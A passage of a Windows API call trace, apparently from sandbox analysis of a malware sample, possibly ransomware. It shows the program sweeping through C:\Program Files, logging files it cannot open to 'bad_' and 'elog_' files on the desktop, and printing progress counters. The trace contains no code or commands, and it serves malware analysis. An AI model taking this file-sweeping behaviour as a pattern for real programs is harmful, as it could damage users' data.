(in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x63feb4, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x63feb4*=0x26, lpOverlapped=0x0) returned 1 [0211.753] Sleep (dwMilliseconds=0x5dc) [0213.262] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\bad_460F9943EA70F103.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\bad_460f9943ea70f103.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0213.263] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\n", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0213.263] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\n", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0213.263] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\n", cchWideChar=59, lpMultiByteStr=0x1fd6da0, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATO_OPER: C:\\Program Files\\Microsoft Office 15\\alfred.exe\r\n", lpUsedDefaultChar=0x0) returned 59 [0213.263] WriteFile (in: hFile=0x2d0, lpBuffer=0x1fd6da0*, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0x63fe20, lpOverlapped=0x0 | out: lpBuffer=0x1fd6da0*, lpNumberOfBytesWritten=0x63fe20*=0x3b, lpOverlapped=0x0) returned 1 [0213.263] CloseHandle (hObject=0x2d0) returned 1 [0213.264] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\elog_460F9943EA70F103.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\elog_460f9943ea70f103.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0213.265] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\n", cchWideChar=3702, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3702 [0213.265] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\n", cchWideChar=3702, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3702 [0213.265] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\n", cchWideChar=3702, lpMultiByteStr=0x396f028, cbMultiByte=3702, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nº¹§¡_MÂÍ", lpUsedDefaultChar=0x0) returned 3702 [0213.265] WriteFile (in: hFile=0x2d0, lpBuffer=0x396f028*, nNumberOfBytesToWrite=0xe76, lpNumberOfBytesWritten=0x63fe20, lpOverlapped=0x0 | out: lpBuffer=0x396f028*, lpNumberOfBytesWritten=0x63fe20*=0xe76, lpOverlapped=0x0) returned 1 [0213.266] CloseHandle (hObject=0x2d0) returned 1 [0213.267] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=207 / B=1 / T=2891", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0213.267] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=207 / B=1 / T=2891", cchWideChar=38, lpMultiByteStr=0x1fe531c, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][10]: G=207 / B=1 / T=2891", lpUsedDefaultChar=0x0) returned 38 [0213.267] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x63feb4, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x63feb4*=0x26, lpOverlapped=0x0) returned 1 [0213.267] Sleep (dwMilliseconds=0x5dc) [0215.163] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=223 / B=1 / T=2891", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0215.163] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r[LPROGRESS][10]: G=223 / B=1 / T=2891", cchWideChar=38, lpMultiByteStr=0x1fe5514, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r[LPROGRESS][10]: G=223 / B=1 / T=2891", lpUsedDefaultChar=0x0) returned 38 [0215.163] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x63feb4, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x63feb4*=0x26, lpOverlapped=0x0) returned 1 [0215.513] Sleep (dwMilliseconds=0x5dc) [0218.007] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\elog_460F9943EA70F103.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\elog_460f9943ea70f103.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f8 [0218.092] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\PDIALOG.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Shorthand.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\PDIALOG.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Music.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Multimedia Platform\\tones engaging.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\ImagingDevices.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoAcq.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwmon.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_2.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\th-italia.exe\". The process cannot access the file because it is being used by another process\r\nOPER_ATO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Uninstall Information\\italian.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\blank.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\To_Do_List.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\PhotoViewer.dll.mui\". Access is denied\r\n", cchWideChar=4182, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4182 [0218.093] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="OPER_BTO: Cannot open file \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\jnwdui.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Genko_1.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Journal.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Seyes.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\WinMail.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Portable Devices\\restaurant.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\expenditurevincenttablet.exe\". The process cannot access the file because it is being used by another process\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\MSPVWCTL.DLL.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Memo.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\wabmig.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Photo Viewer\\en-US\\ImagingDevices.exe.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Month_Calendar.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\WinMail.exe\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\en-US\\JNTFiltr.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Journal\\Templates\\Dotted_Line.jtp\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\Windows Mail\\en-US\\msoeres.dll.mui\". Access is denied\r\nOPER_BTO: Cannot open file \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.VisualBasic.Targets\". Access is 